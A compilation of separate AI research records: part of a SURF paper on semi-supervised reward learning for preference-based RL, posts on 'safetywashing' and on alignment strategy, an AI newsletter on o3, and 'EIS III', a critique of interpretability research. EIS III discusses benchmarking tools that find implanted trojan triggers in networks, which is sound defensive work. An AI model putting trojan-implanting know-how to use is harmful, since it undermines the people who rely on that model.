Figure 10: Learning curves on robotic manipulation tasks as measured on the success rate. The solid line and shaded regions represent the mean and standard deviation, respectively, across five runs.
Implementation details of SURF.
For all experiments, we use the same hyperparameters
used by the original SAC and PEBBLE algorithms,
such as the learning rate of the neural networks and the frequency of the feedback session.
For the query selection strategy,
we use the disagreement-based sampling scheme,
which selects queries with high uncertainty, i.e., high ensemble disagreement (see Appendix B for more details).
At each feedback session, we sample 10 times as many unlabeled pairs as labeled ones using a uniform sampling scheme, unless otherwise noted.
Although we limit the number of unlabeled samples for time-efficient training, we note that one can utilize many more unlabeled samples as needed.
For the hyperparameters of SURF, we fix the loss weight $\lambda=1$ and the unlabeled batch ratio $\mu=4$ for all experiments,
and use the threshold parameter $\tau=0.999$ for the Window Open, Sweep Into, and Cheetah tasks, and $\tau=0.99$ for the others.
We provide more experimental details in Appendix B.
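As a sketch of the disagreement-based query selection described above, one can score each candidate pair by the standard deviation of an ensemble's preference predictions; this reading of "ensemble disagreement" is our assumption, and the exact scheme is described in the paper's Appendix B (reuses `preference_prob` from the earlier sketch):

```python
import numpy as np

def disagreement_sampling(ensemble, candidate_pairs, n_queries):
    """Select the pairs on which an ensemble of reward models disagrees most."""
    scores = []
    for seg0, seg1 in candidate_pairs:
        preds = [preference_prob(r, seg0, seg1) for r in ensemble]
        scores.append(np.std(preds))  # high std = high disagreement
    top = np.argsort(scores)[-n_queries:]
    return [candidate_pairs[i] for i in top]
```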
Extension to visual control tasks.
To further demonstrate the effectiveness of our method, we also provide experimental results on visual control tasks, where each observation is an image of size 84×84×3.
Specifically, we choose DrQ-v2 (yarats2021drqv2), a state-of-the-art pixel-based RL approach on DMControl, as a backbone algorithm for PEBBLE and SURF.
Similar to experiments with state-based inputs, we also compare to DrQ-v2 using ground truth reward as an upper bound.
### 5.2 Benchmark tasks with scripted teachers
Meta-world experiments.
Meta-world consists of 50 robotic manipulation tasks, which are designed for learning diverse manipulation skills.
We consider six tasks from Meta-world
to investigate how SURF improves a preference-based learning method
on a range of complex robotic manipulation tasks (see Figure 33 in Appendix B).
Figure 10 shows the learning curves of SAC, PEBBLE, and SURF (combined with PEBBLE) on the manipulation tasks.
In each task, PEBBLE and SURF utilize the same number of preference queries for a fair comparison.
As shown in the figure,
SURF significantly improves the performance of PEBBLE given the same amount of feedback on all tasks we consider,
and
matches the performance of SAC using the ground-truth reward on four tasks.
For example, we find that when using 400 preference queries on the Window Open task, SURF (red) reaches the same performance as SAC (green) while PEBBLE (blue) lags far behind SAC.
We also observe that SURF achieves performance similar to PEBBLE with far fewer labels.
For example, to achieve performance comparable to SAC on the Window Open task, PEBBLE needs 2,500 queries (as reported in pebble), about 6 times more queries than SURF.
These results demonstrate that SURF significantly reduces the feedback required to solve complex tasks.
DMControl experiments.
For locomotion tasks, we choose three complex environments from DMControl: Walker-walk, Cheetah-run, and Quadruped-walk.
Figure 14 shows the learning curves of the algorithms with the same number of queries.
We find that using a budget of 100 or 1,000 queries (which would take a human only a few minutes to provide),
SURF (red) significantly improves the performance of PEBBLE (blue).
These results again demonstrate
that SURF improves the feedback-efficiency of preference-based RL methods on a variety of complex tasks.
[Figure 14 panels: (a) Walker, (b) Cheetah, (c) Quadruped]
Figure 14: Learning curves on locomotion tasks as measured on the ground truth reward. The solid line and shaded regions represent the mean and standard deviation, respectively, across five runs.
### 5.3 Ablation study
Component analysis.
To evaluate the effect of each technique in SURF individually,
we incrementally apply semi-supervised learning (SSL) and temporal cropping (TC) to our backbone algorithm, PEBBLE.
Figure 18(a) shows the learning curves of SURF on the Walker-walk task with 100 queries.
We observe that leveraging unlabeled samples via pseudo-labeling (green) significantly improves PEBBLE, in terms of both sample-efficiency and asymptotic performance, while standard PEBBLE (blue) suffers from lack of supervision.
In addition,
both supervised (blue) and semi-supervised (green) reward learning are further improved by additionally utilizing temporal cropping (purple and red, respectively).
This implies that our augmentation method improves label-efficiency by generating diverse behaviors that share the same labels.
Also, the results show that the key components of SURF are both effective, and their combination is essential to our method’s success.
We also provide extensive ablation studies on Meta-world, which show similar tendencies, in Appendix C.
Figure 18: Ablation study on Walker-walk.
(a) Contribution of each technique in SURF, i.e., semi-supervised learning (SSL) and temporal cropping (TC).
(b) Effects of query size.
(c) Comparison of augmentation methods.
The results show the mean and standard deviation averaged over five runs.
[Figure 22 panels: (a) Unlabeled batch ratio $\mu$, (b) Threshold parameter $\tau$, (c) Loss weight $\lambda$]
Figure 22: Hyperparameter analysis on Walker-walk using 100 preference queries.
The results show the mean and standard deviation averaged over five runs.
Effects of query size.
To investigate how the number of queries affects the performance of SURF, we evaluate SURF with a varying number of queries $N\in\{50,100,200,400\}$.
As shown in Figure 18(b), SURF (solid lines) consistently improves the performance of PEBBLE (dotted lines) across a wide range of query sizes.
The gain from SURF becomes even more significant in extremely label-scarce scenarios, i.e., $N\in\{50,100\}$.
Comparison to other augmentations for state-based inputs.
To demonstrate that temporal cropping
induces significant improvements for reward learning,
we compare our method to other augmentation methods for state-based inputs.
We consider random amplitude scaling (RAS) and adding Gaussian noise (GN) proposed in laskin2020reinforcement as our baselines.
RAS multiplies the state by a uniform random variable $z$, i.e., $\hat s = s\cdot z$, where $z\sim\mathrm{Unif}[\alpha,\beta]$, and
GN adds a multivariate Gaussian random variable $z$ to the state, i.e., $\hat s = s+z$, where $z\sim\mathcal{N}(0,I)$.
As proposed in laskin2020reinforcement, we apply these methods consistently along the time dimension, and choose the parameters for RAS as $\alpha=0.8$, $\beta=1.2$.
Specifically, for a given segment $\sigma=\{(s_k,a_k),\dots,(s_{k+H-1},a_{k+H-1})\}$, we obtain the augmented sample
$\hat\sigma=\{(\hat s_k,a_k),\dots,(\hat s_{k+H-1},a_{k+H-1})\}$ by perturbing each state along the segment.
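A minimal sketch of the two baseline augmentations; we read "consistently along the time dimension" as sharing one random draw across all timesteps of a segment, which is our assumption rather than a detail stated here:

```python
import numpy as np

def random_amplitude_scaling(states, alpha=0.8, beta=1.2):
    """RAS: s_hat = s * z with z ~ Unif[alpha, beta], one draw per segment."""
    z = np.random.uniform(alpha, beta)
    return [np.asarray(s) * z for s in states]

def gaussian_noise(states, sigma=1.0):
    """GN: s_hat = s + z with z ~ N(0, sigma^2 I), one draw per segment."""
    z = sigma * np.random.normal(size=np.shape(states[0]))
    return [np.asarray(s) + z for s in states]
```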
In Figure 18(c), we plot the learning curves of PEBBLE with various data augmentations on the Walker-walk task with 100 queries.
We observe that
RAS improves the performance of PEBBLE, but
temporal cropping still outperforms both baseline augmentations.
GN degrades the performance, possibly due to the noisy inputs.
Since RAS is an orthogonal approach for augmenting state-based inputs, one can integrate it with our method to further improve performance.
This may be an interesting future direction for addressing feedback-efficiency in preference-based RL (see Appendix C).
Effects of hyperparameters of SURF.
We investigate how the hyperparameters of SURF affect the performance of preference-based RL.
In Figure 22, we plot the learning curves of SURF with different sets of hyperparameters: (a) unlabeled batch ratio $\mu\in\{1,2,4,7\}$, (b) threshold parameter $\tau\in\{0.95,0.97,0.99,0.999\}$, and (c) loss weight $\lambda\in\{0.1,0.5,1,2\}$.
First, we observe that
SURF is quite robust to $\mu$, though the performance drops slightly with a large unlabeled batch ratio $\mu=7$.
We expect that this is because a large ratio makes the reward model overfit to the unlabeled data.
We also observe that SURF is robust to the threshold $\tau$, except for the smallest value of 0.95. Because our tasks have only two classes, the optimal threshold can be larger than the value typically used in previous SSL methods (sohn2020fixmatch), i.e., 0.95.
In the case of the loss weight $\lambda$, tuning this parameter brings larger improvements than the other hyperparameters.
Although we use a simple choice, i.e., $\lambda=1$, in our experiments, further tuning of $\lambda$ would likely improve the performance of our method.
### 5.4 Experiments on visual control tasks
Figure 26 shows the learning curves of DrQ-v2, PEBBLE, and SURF with the same number of queries.
We observe that SURF (red) significantly improves the performance of PEBBLE (blue).
In particular, SURF achieves performance comparable to DrQ-v2 (green) with ground-truth reward on Walker-walk, using a budget of only 200 queries.
These results demonstrate that SURF can also improve performance with image observations.
We remark that our temporal cropping augmentation can be combined with any existing image augmentation methods,
which would be an interesting future direction to explore.
[Figure 26 panels: (a) Walker, (b) Cheetah, (c) Quadruped]
Figure 26: Learning curves on locomotion tasks with pixel-based inputs as measured on the ground truth reward. The solid line and shaded regions represent the mean and standard deviation, respectively, across five runs.
6 Discussion
-------------
In this work, we present SURF, a semi-supervised reward learning algorithm with data augmentation for preference-based RL.
First, in order to utilize an unlimited amount of unlabeled data,
we apply pseudo-labeling to confident samples.
Also, to enforce consistency in the reward function,
we propose a new data augmentation method called temporal cropping.
Our experiments demonstrate that SURF significantly improves the feedback-efficiency of the current state-of-the-art method on a variety of complex robotic manipulation and locomotion tasks.
We believe that SURF can scale up deep RL to more diverse and challenging domains by making preference-based learning more tractable.
An interesting future direction is to extend our approach from state-based inputs to
partially-observable or high-dimensional inputs, e.g., pixels.
One can expect that representation learning based on unlabeled samples and data augmentation (chen2020simple; grill2020bootstrap) is crucial to handle such inputs.
We think that our investigations on leveraging unlabeled samples and data augmentation would be useful in representation learning for preference-based RL.
Ethics statement.
Preference-based RL can align RL agents with the teacher’s preferences,
which enables us to apply RL to diverse problems and obtain strong AI.
However, there could be negative impacts
if a malicious user corrupts the preferences to teach the agent harmful behaviors.
Since we have proposed a method that makes preference-based RL algorithms more feedback-efficient,
our method may reduce the effort required to teach not only desirable behaviors but also such harmful ones.
For this reason, in addition to developing algorithms for better performance and efficiency, it is also important to consider safe adaptation in the real world.
Reproducibility statement.
We describe the implementation details of SURF in Appendix B, and also provide our source code in the supplementary material.
Acknowledgements and Disclosure of Funding
------------------------------------------
This work was supported by Samsung Electronics Co., Ltd (IO201211-08107-01), Open Philanthropy, and an Institute of Information & Communications Technology Planning & Evaluation (IITP) grant funded by the Korea government (MSIT) (No. 2019-0-00075, Artificial Intelligence Graduate School Program (KAIST)).
We would like to thank Junsu Kim and the anonymous reviewers for providing helpful feedback and suggestions for improving our paper. |
29cfb01e-4a0e-4bd7-806b-3b52059fbf9d | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Safetywashing
In southern California there’s a two-acre butterfly preserve owned by the oil company Chevron. They spend little to maintain it, but many millions on television advertisements featuring it as evidence of their environmental stewardship.[[1]](#fn9m6ozmbv1h)
Environmentalists have a word for behavior like this: *greenwashing*. Greenwashing is when companies misleadingly portray themselves, or their products, as more environmentally-friendly than they are.
Greenwashing often does cause real environmental benefit. Take the signs in hotels discouraging you from washing your towels:
My guess is that the net environmental effect of these signs is in fact mildly positive. And while the most central examples of greenwashing involve deception, I’m sure some of these signs are put up by people who earnestly care. But I suspect hotels might tend to care less about water waste if utilities were less expensive, and that Chevron might care less about El Segundo Blue butterflies if environmental regulations were less expensive.
The field of AI alignment is growing rapidly. Each year it attracts more resources, more mindshare, more people trying to help. The more it grows, the more people will be incentivized to misleadingly portray themselves or their projects as more alignment-friendly than they are.
I think some of this is happening already. For example, a capabilities company launched recently with the aim of training transformers to use every API in the world, which they described as the “safest path to general intelligence.” As I understand it, their argument is that this helps with alignment because it involves collecting feedback about people’s preferences, and because humans often wish AI systems could more easily take actions in the physical world, which is easier once you know how to use all the APIs.[[2]](#fn19yz1jq2g5p)
It’s easier to avoid things that are easier to notice, and easier to notice things with good handles. So I propose adopting the handle “safetywashing.”
1. **[^](#fnref9m6ozmbv1h)**From what I can tell, the [original source](https://books.google.com/books?id=2CHLmPx2PJ0C&pg=PA173&lpg=PA173&dq=Chevron+%22People+do%22+campaign+criticism&source=bl&ots=Re5kl9yUqZ&sig=MBqepaSKX5BV_nZm0mGhdmDWVls&hl=en&sa=X&ved=0ahUKEwiS4Mz2h5nOAhWDNx4KHSrxCokQ6AEILTAC#v=onepage&q=Chevron%20%22People%20do%22%20campaign%20criticism&f=false) for this claim is the book “The Corporate Planet: Ecology and Politics in the Age of Globalization,” which from my samples seems about as pro-Chevron as you’d expect from the title. So I wouldn’t be stunned if the claim were misleading, though the numbers passed my sanity check, and I did confirm the [preserve](https://www.google.com/maps/place/El+Segundo+Blue+Butterfly+Preserve/@33.9317558,-118.4363199,17z/data=!3m1!4b1!4m5!3m4!1s0x80c2b10689666af3:0x24b28b7232bb5c91!8m2!3d33.9317514!4d-118.4341312) and [advertisements](https://www.youtube.com/watch?v=wnHdNH6Fmy8&ab_channel=CowMissing) exist.
2. **[^](#fnref19yz1jq2g5p)**I haven’t talked with anyone who works at this company, and all I know about their plans is from the copy on their website. My guess is that their project harms, rather than helps, our ability to ensure AGI remains safe, but I might be missing something. |
e67bab06-8adb-4cd0-a103-2476df68ce25 | trentmkelly/LessWrong-43k | LessWrong | AI #96: o3 But Not Yet For Thee
The year in models certainly finished off with a bang.
In this penultimate week, we get o3, which purports to give us vastly more efficient performance than o1, and also to allow us to choose to spend vastly more compute if we want a superior answer.
o3 is a big deal, making big gains on coding tests, ARC and some other benchmarks. How big a deal is difficult to say given what we know now. It’s about to enter full fledged safety testing.
o3 will get its own post soon, and I’m also pushing back coverage of Deliberative Alignment, OpenAI’s new alignment strategy, to incorporate into that.
We also got DeepSeek v3, which claims to have trained a roughly Sonnet-strength model for only $6 million and 37b active parameters per token (671b total via mixture of experts).
DeepSeek v3 gets its own brief section with the headlines, but full coverage will have to wait a week or so for reactions and for me to read the technical report.
Both are potential game changers, both in their practical applications and in terms of what their existence predicts for our future. It is also too soon to know if either of them is the real deal.
Both are mostly not covered here quite yet, due to the holidays. Stay tuned.
TABLE OF CONTENTS
1. Language Models Offer Mundane Utility. Make best use of your new AI agents.
2. Language Models Don’t Offer Mundane Utility. The uncanny valley of reliability.
3. Flash in the Pan. o1-style thinking comes to Gemini Flash. It’s doing its best.
4. The Six Million Dollar Model. Can they make it faster, stronger, better, cheaper?
5. And I’ll Form the Head. We all have our own mixture of experts.
6. Huh, Upgrades. ChatGPT can use Mac apps, unlimited (slow) holiday Sora.
7. o1 Reactions. Many really love it, others keep reporting being disappointed.
8. Fun With Image Generation. What is your favorite color? Blue. It’s blue.
9. Introducing. Google finally gives us LearnLM.
10. They Took Our Jobs. Why are you still writing your own code?
|
9e933c20-7111-4f06-a685-7144154d2a18 | trentmkelly/LessWrong-43k | LessWrong | Gearing Up for Long Timelines in a Hard World
Tl;dr: My current best plan for technical alignment is to work on: (1) Improving our gears-level understanding of the internals & their dynamics of advanced AI systems, and (2) work on pathways decorrelated with progress in the first direction - likely in the form of pivotal processes in davidad’s Neorealist perspective.
Thing We Want
The Thing We Want is an awesome future for humanity. If we're living in a world where alignment is hard and timelines are short, we’re probably dead whatever we do. So I would rather focus my attention on addressing worlds where alignment is hard and timelines are long.[1]
In my view, we can’t trust empirical facts about prosaic models to generalize, because there are likely rapid phase transitions and capability regimes during which we don't get much chance to iterate on. For example, I expect that as the system starts to self-reflect, optimization pressures will start being applied to various invariants of past systems, thus breaking their properties (and the theoretical guarantees that relied on such invariants).
How to Get the Thing We Want
One perspective for categorizing alignment proposals is to take a view from the highest level, at which there are three broad targets: Corrigibility, Value alignment, and Pivotal act/process (+ other stuff I'm ignoring for now, like DWIM).
Building systems that can be trusted to follow its natural capability attractor
A commonality between Corrigibility and Value alignment is that their aim is to ensure that the AI, following its natural gradient towards increasing coherence and consequentialist cognition, ends up at an equilibrium that we prefer—like controlling where an arrow lands by controlling the bow, and trusting the arrow to do what we expect it to do after we let it go.
Thus, in order to trust these systems to do the sort of consequentialist cognition we want, these two targets seem to require that we have strong theoretical guarantees about those AI systems in a form that's rob |
8cbe9d63-e7db-490c-ba61-d8e6bdd210e4 | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | EIS III: Broad Critiques of Interpretability Research
Part 3 of 12 in the [Engineer’s Interpretability Sequence](https://www.alignmentforum.org/s/a6ne2ve5uturEEQK7).
Right now, interpretability is a major subfield in the machine learning research community. As mentioned in EIS I, there is so much work in interpretability that there is now a database of 5199 interpretability papers [(Jacovi, 2023)](https://arxiv.org/abs/2301.05433). You can also look at a survey from some coauthors and me on over 300 works on interpreting network internals [(Räuker et al., 2022)](https://arxiv.org/abs/2207.13243).
The key promise of interpretability is to offer open-ended ways of understanding and evaluating models that help us with AI safety. And the diversity of approaches to interpretability is encouraging since we want to build a toolbox full of many different useful techniques. But despite how much interpretability work is out there, the research has not been very good at producing competitive practical tools. **Interpretability tools lack widespread use by practitioners in real applications**([Doshi-Velez and Kim, 2017](https://arxiv.org/abs/1702.08608); [Krishnan, 2019](https://link.springer.com/article/10.1007/s13347-019-00372-9); [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)).
The root cause of this has much to do with interpretability research not being approached with as much engineering rigor as it ought to be. This has become increasingly well-understood. Here is a short reading list for anyone who wants to see more takes that are critical of interpretability research. This post will engage with each of these more below.
1. [The Mythos of Model Interpretability (Lipton, 2016)](https://arxiv.org/abs/1606.03490)
2. [Towards A Rigorous Science of Interpretable Machine Learning (Doshi-Velez and Kim, 2017)](https://arxiv.org/abs/1702.08608)
3. [Explanation in Artificial Intelligence: Insights from the Social Sciences (Miller, 2017)](https://arxiv.org/abs/1706.07269)
4. [Stop Explaining Black Box Machine Learning Models for High Stakes Decisions and Use Interpretable Models Instead (Rudin, 2018)](https://arxiv.org/abs/1811.10154)
5. [Against Interpretability: a Critical Examination of the Interpretability Problem in Machine Learning (Krishnan, 2019)](https://link.springer.com/article/10.1007/s13347-019-00372-9)
6. [Toward Transparent AI: A Survey on Interpreting the Inner Structures of Deep Neural Networks (Räuker et al., 2022)](https://arxiv.org/abs/2207.13243)
7. [Benchmarking Interpretability Tools for Deep Neural Networks (Casper et al., 2023)](https://arxiv.org/abs/2302.10894)
Note that I’m an author on the final two, so references to these papers are self-references. Also, my perspectives here are my own and should not be assumed to necessarily reflect those of coauthors.
The goal of this post is to overview some broad limitations with interpretability research today. See also EIS V and EIS VI which discuss some similar themes in the context of AI safety and mechanistic interpretability research.
The central problem: evaluation
===============================
The hardest thing about conducting good interpretability research is that it’s not clear whether an interpretation is good or not when there is no ground truth to compare it to. Neural systems are complex, and it’s hard to verify that an interpretation faithfully describes how a network truly functions. So what does it even mean to be meaningfully interpreting a network? There is unfortunately no agreed upon standard. Motivations and goals of interpretability researchers are notoriously “diverse and discordant” ([Lipton, 2018](https://arxiv.org/abs/1606.03490)). But here, we will take an engineer’s perspective and consider interpretations to be good to the extent that they are *useful*.
Evaluation by intuition is inadequate.
--------------------------------------
[Miller (2019)](https://arxiv.org/abs/1706.07269) observes that **“Most work in explainable artificial intelligence uses only the researchers’ intuition of what constitutes a ‘good’ explanation”**. Some papers and posts have even formalized evaluation by intuition. Two examples are [Yang et al. (2019)](https://arxiv.org/abs/1907.06831) and [Kirk et al. (2020)](https://www.alignmentforum.org/posts/rSMbGFfsLMB3GWZtX/what-is-interpretability) who proposed evaluation frameworks that included a criterion called “persuadability.” This was defined by [Yang et al. (2019)](https://arxiv.org/abs/1907.06831) as “subjective satisfaction or comprehensibility for the corresponding explanation.”
This is not a very good criterion from an engineer’s perspective because it only involves intuition. To this day, there is a persistent problem in which sometimes researchers simply look at their results and pontificate about what they mean without putting the interpretations to rigorous tests. A recent example of this from AI safety work is from [Elhage et al. (2022)](https://transformer-circuits.pub/2022/solu/index.html) who evaluated a neural interpretability technique by measuring how easily human subjects were able to simply form hypotheses about what roles neurons played in a network.
The obvious problem with evaluation using human intuition is that it isn’t very good science – it treats hypotheses as conclusions ([Rudin, 2019](https://arxiv.org/abs/1811.10154); [Miller, 2019](https://arxiv.org/abs/1706.07269); [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)). But there are related issues that stem from Goodhart’s law. One is that evaluation by intuition can only guide progress toward methods that are good at explaining simple mechanisms that humans can readily grasp. But this fails to select for ones that might be useful for solving the types of difficult or nontrivial problems that are key for AI safety. Evaluation by intuition also encourages cherrypicking which is common in the literature ([Räuker et al., 2022](https://arxiv.org/abs/2207.13243)). And to the extent that cherrypicking is the norm, this will only tend to guide progress toward methods that are good in their best-case performance. But if we want reliable interpretability tools, we should be aiming for methods that perform well in the average or worst case.
Weak, ad hoc evaluation is not enough either.
---------------------------------------------
Objective evaluation is clearly needed. But **just because an evaluation method involves quantitative measurements or testing falsifiable hypotheses doesn’t mean it’s a very valuable one. Evaluation can adhere to the scientific method while still not being useful for engineering.** As an example, I confess to doing this myself in some past work [(Hod et al., 2021)](https://arxiv.org/abs/2110.08058). In order to test how useful different clusterings of neurons might be for studying networks, we solely used proxy measures. And while we did not claim to be "interpreting" the network by doing so, interpretability was our motivation. Another way this problem often appears is by testing on the training proxy. Sometimes researchers evaluate interpretability tools based on the loss function for whatever model, feature, mask, map, clustering, vector, distance, or other thing was optimized during training. Unless the loss in this case is the exact definition of what is cared about, this will lead to Goodharting. More examples are discussed below.
Again, the main issue here is the obvious one. It’s that not holding interpretability works to engineering-relevant evaluation standards won’t produce methods that are useful for engineering. But another closely-related problem is the commonality of *ad hoc* methods to evaluate tools. The interpretability field probably should -- but does not yet -- have clear and consistent evaluation methods. Instead, the norm is for every paper’s authors to independently introduce and apply their own approach to evaluation. This allows researchers to only select measures that make their technique look good.
Some examples
-------------
Claiming that *most* interpretability research is not evaluated well is the kind of statement that demands some more concreteness. But showcasing arbitrary examples wouldn’t help much with this point. To try to give an unbiased sense of the state of the field, I went to NeurIPS (the largest AI conference) 2021 (the most recent year for which the full list of papers is available at the time of writing this) and searched among [all accepted papers](https://papers.nips.cc/paper/2021) that had “interpretability” in the title. There were 4. **None of them evaluated their techniques in a way that an engineer would find very compelling.**
1. [Understanding Instance-based Interpretability of Variational Auto-Encoders (Kong and Chaudhri, 2021)](https://papers.nips.cc/paper/2021/hash/13d7dc096493e1f77fb4ccf3eaf79df1-Abstract.html) is about analyzing how influential individual training set examples are for how variational autoencoders handle test examples. The experiments are all conducted on MNIST and CIFAR-10. The evaluation does not involve baselines or benchmarks and consists of (1) a sanity check to verify that examples are judged as high-influence for themselves, (2) using the method to produce similar looking “proponents” and different looking “opponents” of testing examples, and (3) using this method for anomaly detection to find that it tends to classify OOD samples as anomalies slightly more than dataset ones on average. (1) is trivial, (2) is intuition-based, and (3) is weak.
2. [Foundations of Symbolic Languages for Model Interpretability (Arenas et al., 2021)](https://papers.nips.cc/paper/2021/hash/60cb558c40e4f18479664069d9642d5a-Abstract.html) is fairly different from the other three papers, and it is not focused on neural nets. It is more of a model checking paper with interpretability implications than a normal ‘interpretability’ paper. The authors introduce a first order logic to describe various properties of models. The only experiments are to evaluate runtime for statement verification on various decision tree models. To be fair to the authors, their goal was to break conceptual and theoretical ground – not to introduce any interpretability tools. But they still do not do anything to show that their framework is a valuable one – all of the arguments for the merits of the framework are theoretical. There is also no discussion of baselines or alternatives, and the only models the paper works with are decision trees. The OpenReview reviews were mostly positive, but one of the reviewers commented “I can't imagine anyone using this for anything useful." I generally agree.
3. [IA-RED^2: Interpretability-Aware Redundancy Reduction for Vision Transformers (Pan et al., 2021)](https://papers.nips.cc/paper/2021/hash/d072677d210ac4c03ba046120f0802ec-Abstract.html) seeks to reduce redundant computations inside of vision transformers. It introduces a dynamic inference method to preprocess image patches to exclude redundant ones. The paper introduces a method for speeding up forward passes through transformers which is nice. But there is little substance on interpretability. The technique is used for feature attribution by constructing saliency maps to highlight what parts of an input image are non-redundant (i.e. “important”) to the model. The authors assert, “our method is inherently interpretable with substantial visual evidence.” And when comparing examples from this method to other feature attribution techniques, they write “We find that our method can obviously better interpret the part-level stuff of the objects of interest.” I don’t find it obvious at all – see the figure below and decide for yourself. Their argument is just based on intuition and maybe even a little wishful thinking.
4. [Improving Deep Learning Interpretability by Saliency Guided Training (Ismail et al., 2021)](https://papers.nips.cc/paper/2021/hash/e0cd3f16f9e883ca91c2a4c24f47b3d9-Abstract.html) is about training networks with a form of regularization that encourages them to have more sparse, lucid saliency maps. It evaluates the saliency maps of trained networks on quantitative measures of how well the features covered by the maps cover *all* and *only* the important features needed for classification. This is quantitative but weak because it fails to connect the method to something of practical use. This paper tests on the training proxy, and it compares the method to a *random* baseline but no comparable ones from previous works. There is actually a significant amount of literature (see page 9 of [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)) that predates this work and connects the same type of regularization that these authors study to useful improvements in adversarial robustness. But the authors of this paper did not discuss, experiment, or cite anything related to improving robustness.

[Pan et al. (2021)](https://papers.nips.cc/paper/2021/hash/d072677d210ac4c03ba046120f0802ec-Abstract.html) claim that the feature attributions from their technique are “obviously better” than alternatives.
In summary, all four of four papers do not meaningfully evaluate methods by connecting them to anything of practical value. And to be clear, I only considered these 4 papers for this purpose – I didn’t cherrypick among selection methods. This is not to say that these papers are bad, uninteresting, or cannot be useful. But from the standpoint of an engineer who wants interpretability research to be rigorously approached and practically relevant, they all fall short of this goal.
Evaluation with meaningful tasks is needed
------------------------------------------
### An example
Suppose I visualize a neuron in a CNN and that it looks like dogs to me.

From [Olah et al. (2017)](https://distill.pub/2017/feature-visualization/)
Then suppose I say,
> Nice, my feature visualization tool works! Look at this dog neuron it identified.
>
>
If I stopped at this point, this would just be intuition and pontification. And while this may not be a bad *hypothesis*, it can’t yet make for a *conclusion*.
Then say I pass some images through the network, look at the results, and say,
> Just as I predicted – the neuron responds more consistently to dog images than non-dog ones.
>
>
This is still not enough. It’s too weak and ad hoc. From an engineer’s perspective, it’s not yet meaningful to say the neuron is a dog neuron unless I do something useful with that interpretation. And there are plenty of ways that a neuron which correlates with dog images could be doing something much more complicated than it seems at first. [Olah et al. (2017)](https://distill.pub/2017/feature-visualization/) acknowledge this. See also [Bolukbasi et al. (2021)](https://arxiv.org/abs/2104.07143) for examples of such “interpretability illusions.”
But then finally, suppose I ablate the neuron from the network, run another experiment, and remark,
> Aha! When I removed the neuron, the network stopped being able to classify dogs correctly but still performs the same on everything else. The same is true for OOD dog data.
>
>
Now we’re talking!
### If we want interpretability tools to help us do meaningful, engineering-relevant things with networks, we should establish benchmarks grounded in useful tasks to evaluate them for these capabilities.
**There is a growing consensus that more rigorous methods to evaluate interpretability tools are needed** ([Doshi-Velez & Kim, 2017](https://arxiv.org/abs/1702.08608); [Lipton, 2018](https://arxiv.org/abs/1606.03490); [Miller, 2019](https://arxiv.org/abs/1706.07269); [Hubinger, 2021](https://www.alignmentforum.org/posts/cQwT8asti3kyA62zc/automating-auditing-an-ambitious-concrete-technical-research); [Krishnan, 2020](https://link.springer.com/article/10.1007/s13347-019-00372-9); [Hendrycks & Woodside, 2022](https://www.lesswrong.com/s/FaEBwhhe3otzYKGQt/p/AtfQFj8umeyBBkkxa); [CAIS, 2022](https://benchmarking.mlsafety.org/); [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)). So what does good evaluation look like? Evaluation tools should measure how *competitive* interpretability tools are for helping humans or automated processes do one of the following three things.
1. **Making novel predictions about how the system will handle OOD inputs.** This could include designing adversaries, discovering trojans, or predicting model behavior on interesting OOD inputs.
2. **Controlling what a system does by guiding edits to it.**This could involve cleanly implanting trojans, removing trojans, or making the network do other novel things via manual changes or targeted forms of fine-tuning.
3. **Abandoning a system that does a nontrivial task and replacing it with a simpler reverse-engineered alternative.** This would mean showing that a system or subsystem can be replaced with something simpler such as a sparse network, linear model, decision tree, program, etc.
Notably, these three things logically partition the space of possible approaches: working with the inputs, working with the system, or getting rid of the whole thing and using something else.
**Meaningful benchmarking in interpretability is almost nonexistent, but benchmarks are important for driving progress in a field.** They concretize research goals, give indications of what approaches are the most useful, and spur community efforts [(Hendrycks and Woodside, 2022)](https://www.lesswrong.com/s/FaEBwhhe3otzYKGQt/p/AtfQFj8umeyBBkkxa).
To help demonstrate the value of benchmarking, some coauthors and I recently finished a paper [(Casper et al., 2023)](https://arxiv.org/abs/2302.10894). We use strategy #1 above and evaluate interpretability tools based on how helpful they are to humans who want to rediscover interpretable trojans. A useful thing about this benchmarking task is that trojan triggers can be arbitrary and may not appear in a particular dataset. So novel triggers cannot be discovered by simply analyzing the examples from a dataset that the network mishandles. Thus, rediscovering them mirrors the practical challenge of finding flaws that evade detection with a test set. In other words – this benchmarking task tests **competitiveness** for debugging.
We tested 9 different feature synthesis methods (rows) on 12 different trojans (columns) below. In the table below, each cell gives the proportion of the time that a method helped humans correctly identify a trojan trigger in a multiple choice test. See the paper for details.

From [Casper et al. (2023)](https://arxiv.org/abs/2302.10894)
Notice two things in the data. First, some methods perform poorly including TABOR [(Guo et al., 2019)](https://arxiv.org/abs/1908.01763) and three of the four feature visualization (FV) methods ([Olah et al., 2017](https://distill.pub/2017/feature-visualization/), [Mordvintsev et al., 2018](https://distill.pub/2018/differentiable-parameterizations/)). So this experiment demonstrates how benchmarks can offer information about what does and doesn’t work well. Second, even the methods that do relatively well still fail to achieve a 50% success rate on average, so there is still more work to do to make these types of tools very reliable. From an engineer’s perspective, this is all valuable information.
There are many interpretability tools out there, so why did we only test 9 based on feature synthesis? This is because these 9 were the only ones of which we knew that are suited for this task at all. **Most interpretability tools are only useful for analyzing how a network works on either specific examples or on a specific dataset**[**(Räuker et al., 2022)**](https://arxiv.org/abs/2207.13243)**. In fact, very few are useful for studying how a network may (mis)behave on novel inputs.** Only feature synthesis methods can be **competitive** for identifying *novel* trojan triggers because no non-synthesis method can give insights off a given data distribution. And when it comes to aligning highly intelligent and potentially deceptive systems, it seems likely that the failures that are difficult to find are going to be due to inputs well off the training distribution.
Other problems
==============
Not scaling
-----------
Many interpretability tools have only been demonstrated to work at a small scale such as small MLPs trained on MNIST or small transformers trained on toy problems. But simple networks performing simple tasks can only be deployed in a limited number of settings of any practical consequence, and they often should be replaced with other intrinsically interpretable, non-network models ([Rudin, 2018](https://arxiv.org/abs/1811.10154)). Working at a small scale is usually a prerequisite to scaling things up later, and some lessons that can be learned from small experiments may offer excellent inspiration for future work. But unless there exists a realistic pathway from research at a small scale to more useful work at a large one, small-scale work seems to be of little direct value.
Relying too much on humans
--------------------------
